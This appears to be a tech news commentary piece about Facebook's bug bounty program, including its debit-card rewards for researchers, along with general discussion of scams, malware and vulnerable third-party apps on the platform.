Patrick Lambert looks at Facebook's recent attempts to reward bug hunters on their site and help fight the rising tide of malware and other scams.
It's no secret, the bad guys go where the money is. If you have a landscape full of people, with many possible attack vectors, then you'll quickly find a lot of eyes trying to find opportunities. Whether that's scams, hacks, or any other type of vulnerabilities, Facebook has become a prime target. With over 800 million users, it's no surprise that the site has become home to more than just photo sharing and status updates. It's also where a lot of scams happen, and any time a bug or hole is found, many exploits follow very quickly. The company has been hit pretty hard lately on that front, but isn't sitting down either; now they're going even farther than others with rewarding bug hunting.
You don't have to go back far to find these problems cropping up on the site. Just last month, private photos of Mark Zuckerberg were shared to the world, after a bug was found in the latest privacy settings. According to Facebook PR, the bug was live only for a limited period of time, but for a target of such a huge importance, that's plenty of time to get the founder's private items and expose them. Who knows how many other users were hit as well? People have long complained that the site's privacy settings were badly implemented, and confusing, but every time they release a new version, there's also the possibility for new bugs and errors. That's what crackers wait for, and when new malware gets deployed. It only takes a few hours for Facebook exploits to be created it seems, and sometimes it can take a lot longer for them to be fixed.
We found that on average the applications assessed had vulnerabilities in 2.5 vulnerability classes (e.g. Cross Site Scripting or SQL Injection,) and none of the applications were completely free of vulnerabilities. Given the attack surface of these applications is so small, this is a somewhat surprising statistic.
Whether that's surprising or not is actually up for debate. It's no surprise that most newly written code is buggy. The problems don't limit themselves to actual code errors either. A lot of apps are written for malicious purposes in the first place, with scams being very popular. Whether users are attracted by the promise of a free iPad, or to a fake contest, an app can learn a lot about users who click "Yes" in the little dialog box that pops up.
The number of web sites out there with simple XSS or SQL issues is very high, with new sites being hacked almost on a daily basis. But when you write a Facebook app, you're no longer a small site where your own users are at risk. Suddenly you're part of the Facebook ecosystem, and any Facebook user becomes a target. Apps interact with the rest of Facebook through the API, and even though these calls are behind the scene, they are in a sense even more important than the actual site itself, since that's how so much of that data transacts. If there's any problem on that end, normal users won't likely see it and report it, but those developers who dig into the code certainly will.
Facebook knows that bugs must be found and fixed quickly, which is why it implemented a bug hunting program, just like Google, Mozilla, and many other companies have done in the past. The idea is that when a white hat hacker finds an exploit, and reports it to the company, as opposed to using it for bad intentions, they get rewarded with cash. And recently, Facebook has started going further. Now, they issue debit cards to researchers who report bugs, and add money to those cards at each reported bug. This is a somewhat innovative way to do things, and allow people to show off that they indeed are part of the bug bounty program.
Overall, there's no question that Facebook will remain a prime target for malware, scams, and others. It's just too big of a system to be left alone, and as they add more and more features on their site and API, bugs are going to continue popping up. The question isn't whether more large problems will appear, but more how fast they will be handled. It's quite a challenge to keep a site like Facebook safe and secure, and is a never ending effort on the part of the engineers at the company. For white hat hackers, you might find some solid employment bug-hunting for Facebook.